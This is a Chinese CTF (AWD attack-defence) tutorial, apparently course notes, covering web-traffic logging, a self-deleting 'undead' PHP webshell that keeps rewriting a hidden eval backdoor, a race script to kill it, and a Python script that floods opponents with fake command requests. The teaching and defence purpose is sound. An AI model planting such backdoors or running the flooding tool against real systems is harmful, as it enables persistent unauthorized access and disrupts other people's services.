p81 红蓝对抗-AWD 监控不死马垃圾包资源库

2024-01-10 13:20

本文主要是介绍p81 红蓝对抗-AWD 监控不死马垃圾包资源库,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

数据来源

注意:一下写的东西是在p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量这篇文章的基础上进行的

演示案例:

  • 防守-流量监控-实时获取访问数据包流量
  • 攻击-权限维持-不死脚本后门生成及查杀其他-恶意操作-搅屎棍发包回首掏共权限
  • 准备-漏洞资源-漏洞资料库及脚本工具库

前提:开启awd项目,并在真实机使用Xshll 7连接虚拟机与 awd靶机的终端,上一篇文章有详细的介绍。

案例 1 - 防守-流量监控-实时获取访问数据包流量

利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效, 也能确保分析到无后门攻击漏洞的数据包便于后期利用

实现 WEB 访问监控,文件监控在上一篇文章

1)先上传监听脚本文件到靶机的app目录下,并挂载在后门文件footer.php中

log-record.php  (文章最后的链接可以直接下载,文件位置:AWD红蓝对抗资料工具-小迪安全\AWD_Hunter-master\script\php)

<?php
date_default_timezone_set("Asia/Shanghai");if (!function_exists('getallheaders')) {function getallheaders() {$headers = [];foreach ($_SERVER as $name => $value) {if (substr($name, 0, 5) == 'HTTP_') {$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;}}return $headers;}}function WAF_log() {
global $WAF_query, $WAF_headers, $WAF_post, $WAF_log;
$tmp  = "[" . date('y-m-d H:i:s') . "]\n";
$tmp .= "SRC IP: " . $_SERVER["REMOTE_ADDR"]."\n";
$tmp .= $_SERVER['REQUEST_METHOD'].''.'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]."\n";foreach($WAF_headers as $k => $v) {
if($k=='Accept-Encoding'||$k=='Accept-Language'||$k=='Accept'||$k=='User-Agent'||$k=='Referer'||$k=='Cookie'||$k=='X-Forwarded-For')
$tmp .= $k . ': ' . $v . "\n";
}
if (!empty($WAF_post)) {
$tmp .= "\n". $WAF_post . "\n";
}
$tmp .= "\n";
@file_put_contents($WAF_log."log_".date("H",time()), $tmp, FILE_APPEND);
}$WAF_query = $_SERVER['QUERY_STRING'];
$WAF_headers = getallheaders();
$WAF_post = @file_get_contents('php://input');
$WAF_log = '/tmp/';
$WAF_AD_log = '';WAF_log();
?>

代码解析:

简单理解就是这个脚本会监听网站的行为生成日志文件log_?到当前目录下的 tmp文件夹内

挂载文件

2)检验脚本效果

1、在靶机的终端输入:

        cd tmp                    # 切换到tmp目录下

        ls                            # 查看当前目录的内容,找到生成的日志文件log_?  我这里是log_18

        tail -f log_18          # 等同于--follow=descriptor,根据文件描述符进行追踪,当文件改名或被删除,追踪停止(就是监听log_18日志文件的实时变化)

2、在真实机打开靶机的网站,虚拟机ip:8801  team1    8802  team1     8803  team3(我的脚本是上传team1中所以这里用8801连接)

回到终端查看日志

3、WEB 访问监控的作用

  1. 分析有后门或无后门的攻击行为数据包找到漏洞进行修复
  2. 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍

案例 2 - 攻击-权限维持不死脚本后门生成及查杀

在攻击利用后门获取 Flag 时,不死后门的权限维持尤为重要,同样防守方也要掌握对其不死后门的 查杀和利用,这样才能获取更高的分数,对比文件监控前后问题(文件监控越早开启越好,在文件监控开启后不死马是不能生效的,反之一样)

1)上传不死马

不死马.php

<?php 
ignore_user_abort(true);          // ignore_user_abort 设置与客户机断开是否会终止脚本的执行,如果设置为 true,则忽略与用户的断开,如果设置为 false,会导致脚本停止运行
set_time_limit(0);                     // set_time_limit设置允许脚本运行的时间,单位为秒。如果超过了此设置,脚本返回一个致命的错误。默认值为30秒,如果设置为零,没有时间方面的限制。unlink(__FILE__);                     // unlink() 删除函数的方法,__FILE__代表当前文件自己,删除自己防止被查杀
$file = '.index.php';
$code = '<?php if(md5($_GET["pass"])=="588b0909be46df2e992915a156a4e848"){@eval($_POST[a]);} ?>';  // 定义后面代码
while (1){                                // 设置无限循环file_put_contents($file,$code);       // file_put_contents()函数可以将一个字符串写入文件,写入后门代码usleep(5000);                        // usleep()函数是把调用该函数的线程挂起一段时间(就是暂停执行一段时间),单位是微秒(百万分之一秒)
}
?>

2)改一下不死马的名称与木马生成文件的名称,让人不易发现

文件名改成xd.php , 生成的文件改成 x.php

3)使用不死马

1. 首先访问xd.php文件让他生成不死马(x.php),生成x.php文件后我们原来的xd.php文件就会自动被删除掉(unlink(__FILE__);   // 这句代码做的)

http://192.168.1.13:8801/xd.php

2. 回到Xftp 7 查看

无论是在Xftp 7中还是虚拟机中删除都是删除不掉的

4)克制不死马

1.ps auxww|grep shell.php 找到pid后杀掉进程就可以,你删掉脚本是起不了作用的,因为php执行的时候已经把脚本读进去解释成opcode运行了

2.重启php等web服务

3.用一个ignore_user_abort(true)脚本,一直竞争写入(断断续续)。usleep要低于对方不死马设置的值。

4.创建一个和不死马生成的马一样名字的文件夹。

这里演示使用脚本的方法,创建一个fuck_x.php文件写入以下代码上传到靶机

<?php 
ignore_user_abort(true);        
set_time_limit(0);                   unlink(__FILE__);                  
$file = 'x.php';         // 注意这里的文件名要与不死马的一样
$code = '干掉不死马,随便写,不写也可以';
while (1){                             file_put_contents($file,$code);      usleep(1000);                        // 不死马这里是5000微秒,我们就1000这样生成文件的速度就比他快,就能一直替换掉他
}
?>

运行我们的克制文件 

http://192.168.1.13:8801/fuck_x.php

查看x.php文件 

案例 3 - 其他-恶意操作-搅屎棍发包回首掏共权限

作为各种技术大家都要用的情况下,一个好的攻击漏洞和思路不被捕获和发现,一个好的套路浪费
对手的时间,搅屎棍发包回首掏共权限利用思路可以尝试使用

搅屎棍:目的就是浪费对手时间,我们发的包访问的文件很多不存在对方甚至会怀疑你把文件隐藏起来了又是各种找。

回首掏:配合抓到的真实攻击数据包,利用数据包占用其他人的攻击行为。利用后门去连接其他团队尝试。

1)写脚本(无限发包)

awd_jiaosigun.py
import requests                   # requests这包是用来发送网络请求的
import time                       # 时间模块def scan_attack():shell_file = {'index.php','about.php','services.php','contact.php'}         # 我发现如果目标不存在这个文件,日志是不会记录的,所以这里我写目标靶机的url页面路径payload = {'cat /flag','ls -al','rm -f','echo 1'}                           # 随便写几个命令,等下用来发送请求误导防御者while 1:                         # 设置无限循环不停的发包for i in range(8801, 8804):  # range(num1,num2) 生成数字序列,不包含num2,8801代表第一个靶机  8802 第二个,我这里就开了3个靶机,就是8801-8803for ii in shell_file:url = f'http://192.168.1.13:{i}/{ii}'   # 拼接文件访问地址,ii就是遍历出来的文件名,这个文件不需要真实存在只是用来误导防御者的for iii in payload:  # 这里循环payload内的系统命令data = {'cmd': iii  # 一般一句话马都是会有一个形参接收传入的命令,这里的cmd也是随便写的}try:  # 设置无限循环requests.post(url, data = data)  # 利用requests模块发送post请求print(url)# print("正在搅屎:" + str(i) + '|' + ii + '|' + iii)time.sleep(0.5)  # 暂停0.5s让程序不要跑太快except Exception as e:print(e)passif __name__ == '__main__':scan_attack()

2)开启流量监听(跟上面讲的步骤一样)

        cd tmp                   # 切换到tmp目录下

        ls                            # 查看当前目录的内容,找到生成的日志文件log_?  我这里是log_18

        tail -f log_22         # 需要注意的是log_? 最后这里数字是会变的

3)运行代码,然后查看日志

案例 4-准备-漏洞资源-漏洞资料库及脚本工具库

比赛准备:如何收集并整理好漏洞,文档资料,脚本工具等
漏洞库: exploitdb github 监控最新信息,平常自己收集整理
文档资料:零组类似文档离线版爬虫,各类资料,平常自己收集整理
脚本工具:忍者系统配合自己常用工具, github 监控 awd 脚本,收集整理
忍者安全渗透系统(NINJITSU OS V3)的安装详细过程,亲测新旧vm版本都可安装,附带下载来源_黑色地带(崛起)的博客-CSDN博客

涉及资源:

https://pan.baidu.com/s/1qR0Mb2ZdToQ7A1khqbiHuQ 提取码:
xiao

这篇关于p81 红蓝对抗-AWD 监控不死马垃圾包资源库的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/590962

相关文章

Linux使用nload监控网络流量的方法

《Linux使用nload监控网络流量的方法》Linux中的nload命令是一个用于实时监控网络流量的工具,它提供了传入和传出流量的可视化表示,帮助用户一目了然地了解网络活动,本文给大家介绍了Linu... 目录简介安装示例用法基础用法指定网络接口限制显示特定流量类型指定刷新率设置流量速率的显示单位监控多个

通过prometheus监控Tomcat运行状态的操作流程

《通过prometheus监控Tomcat运行状态的操作流程》文章介绍了如何安装和配置Tomcat,并使用Prometheus和TomcatExporter来监控Tomcat的运行状态,文章详细讲解了... 目录Tomcat安装配置以及prometheus监控Tomcat一. 安装并配置tomcat1、安装

C#实现系统信息监控与获取功能

《C#实现系统信息监控与获取功能》在C#开发的众多应用场景中,获取系统信息以及监控用户操作有着广泛的用途,比如在系统性能优化工具中,需要实时读取CPU、GPU资源信息,本文将详细介绍如何使用C#来实现... 目录前言一、C# 监控键盘1. 原理与实现思路2. 代码实现二、读取 CPU、GPU 资源信息1.

mac中资源库在哪? macOS资源库文件夹详解

《mac中资源库在哪?macOS资源库文件夹详解》经常使用Mac电脑的用户会发现,找不到Mac电脑的资源库,我们怎么打开资源库并使用呢?下面我们就来看看macOS资源库文件夹详解... 在 MACOS 系统中,「资源库」文件夹是用来存放操作系统和 App 设置的核心位置。虽然平时我们很少直接跟它打交道,但了

使用zabbix进行监控网络设备流量

《使用zabbix进行监控网络设备流量》这篇文章主要为大家详细介绍了如何使用zabbix进行监控网络设备流量,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录安装zabbix配置ENSP环境配置zabbix实行监控交换机测试一台liunx服务器,这里使用的为Ubuntu22.04(

springboot健康检查监控全过程

《springboot健康检查监控全过程》文章介绍了SpringBoot如何使用Actuator和Micrometer进行健康检查和监控,通过配置和自定义健康指示器,开发者可以实时监控应用组件的状态,... 目录1. 引言重要性2. 配置Spring Boot ActuatorSpring Boot Act

Java实现任务管理器性能网络监控数据的方法详解

《Java实现任务管理器性能网络监控数据的方法详解》在现代操作系统中,任务管理器是一个非常重要的工具,用于监控和管理计算机的运行状态,包括CPU使用率、内存占用等,对于开发者和系统管理员来说,了解这些... 目录引言一、背景知识二、准备工作1. Maven依赖2. Gradle依赖三、代码实现四、代码详解五

python使用watchdog实现文件资源监控

《python使用watchdog实现文件资源监控》watchdog支持跨平台文件资源监控,可以检测指定文件夹下文件及文件夹变动,下面我们来看看Python如何使用watchdog实现文件资源监控吧... python文件监控库watchdogs简介随着Python在各种应用领域中的广泛使用,其生态环境也

流媒体平台/视频监控/安防视频汇聚EasyCVR播放暂停后视频画面黑屏是什么原因?

视频智能分析/视频监控/安防监控综合管理系统EasyCVR视频汇聚融合平台,是TSINGSEE青犀视频垂直深耕音视频流媒体技术、AI智能技术领域的杰出成果。该平台以其强大的视频处理、汇聚与融合能力,在构建全栈视频监控系统中展现出了独特的优势。视频监控管理系统EasyCVR平台内置了强大的视频解码、转码、压缩等技术,能够处理多种视频流格式,并以多种格式(RTMP、RTSP、HTTP-FLV、WebS

综合安防管理平台LntonAIServer视频监控汇聚抖动检测算法优势

LntonAIServer视频质量诊断功能中的抖动检测是一个专门针对视频稳定性进行分析的功能。抖动通常是指视频帧之间的不必要运动,这种运动可能是由于摄像机的移动、传输中的错误或编解码问题导致的。抖动检测对于确保视频内容的平滑性和观看体验至关重要。 优势 1. 提高图像质量 - 清晰度提升:减少抖动,提高图像的清晰度和细节表现力,使得监控画面更加真实可信。 - 细节增强:在低光条件下,抖